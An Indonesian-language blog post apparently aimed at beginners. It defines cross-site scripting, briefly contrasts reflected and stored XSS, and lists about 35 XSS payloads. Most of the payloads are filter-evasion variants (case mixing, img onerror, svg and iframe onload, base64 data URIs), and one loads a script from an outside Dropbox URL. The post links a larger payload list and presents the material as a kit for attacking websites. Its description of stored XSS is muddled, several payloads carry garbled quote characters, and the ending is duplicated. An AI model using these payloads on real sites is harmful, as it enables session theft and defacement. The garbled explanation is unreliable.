XSS Payloads adalah sekumpulan injeksi kode yang digunakan untuk penyerangan suatu website. XSS sendiri adalah kependekan dari Cross Site Scripting. Kenapa ga CSS? Karena CSS sudah dipake oleh Cascading Style Sheets. XSS terdapat dua jenis serangan, yaitu Reflected XSS dan Stored XSS.
Reflected XSS adalah tipe serangan yang paling umum dan paling mudah dilakukan. Serangan ini biasanya hanya untuk menampilan sebuah text alert atau bisa menampilkan cookie dari sebuah website. Contoh yang paling umum adalah seperti ini.
<script>alert('xss');</script>
Contoh jika pada sebuah website ditambahkan kode diatas maka akan muncul popup yang berisi text "xss". Penambahan kode seperti diatas bisa ditambahkan dikolom pencarian sebuah website. Jika sudah ditambahkan dan sudah kalian pencet enter maka url pada website nya bisa seperti ini. http://site.com/index.php?search=<script>alert('xss');</script>
Stored XSS merupakan serangan XSS yang jarang ditemui dan dampak nya besar bagi sebuah website. Kalo ga salah metode ini memanfaatkan cookie dari website yang sedang diattack.
Kode XSS tidak hanya seperti yang diatas. Namun banyak sekali macamnya. Berikut macam-macam kode injeksi XSS
- <script>alert(123);</script>
- <ScRipT>alert("XSS");</ScRipT>
- <script>alert(123)</script>
- <script>alert("hellox worldss");</script>
- <script>alert(�XSS�)</script>
- <script>alert(�XSS�);</script>
- <script>alert(�XSS�)</script>
- �><script>alert(�XSS�)</script>
- <script>alert(/XSS�)</script>
- <script>alert(/XSS/)</script>
- </script><script>alert(1)</script>
- �; alert(1);
- �)alert(1);//
- <ScRiPt>alert(1)</sCriPt>
- <IMG SRC=jAVasCrIPt:alert(�XSS�)>
- <IMG SRC=�javascript:alert(�XSS�);�>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=javascript:alert(�XSS�)>
- <img src=xss onerror=alert(1)>
- <iframe src="	javascript:prompt(1)	">
- <svg><style>{font-family:'<iframe/onload=confirm(1)>'
- <input/onmouseover="javaSCRIPT:confirm(1)"
- <sVg><scRipt >alert(1) {Opera}
- <img/src=`` onerror=this.onerror=confirm(1)
- <form><isindex formaction="javascript:confirm(1)"
- <img src=``
 onerror=alert(1)

- <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
- <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
- <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
- <script /**/>/**/alert(1)/**/</script /**/"><h1/onmouseover='\u0061lert(1)'>
- <iframe/src="data:text/html,<svg onload=alert(1)>">
- <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
- <svg><script xlink:href=data:,window.open('https://www.google.com/')></script>
Itu tadi beberapa payload xss. Sebenarnya masih banyak payload yang masih belum saya tulis di artikel. Jika kalian ingin melihat seperti apa payload yang lebih banyak lagi kalian bisa mengunjungi link berikut
https://raw.githubusercontent.com/pgaijin66/XSS-Payloads/master/payload.txt
Saya rasa cukup sekian artikel yang dapat saya tulis. Semoga kalian bisa mendapatkan ilmu yang lebih banyak dan Jangan lupa berkunjung ke artikel yang lain ya gan. Terima Kasih!
https://raw.githubusercontent.com/pgaijin66/XSS-Payloads/master/payload.txt
Saya rasa cukup sekian artikel yang dapat saya tulis. Semoga kalian bisa mendapatkan ilmu yang lebih banyak dan Jangan lupa berkunjung ke artikel yang lain ya gan. Terima Kasih!
إرسال تعليق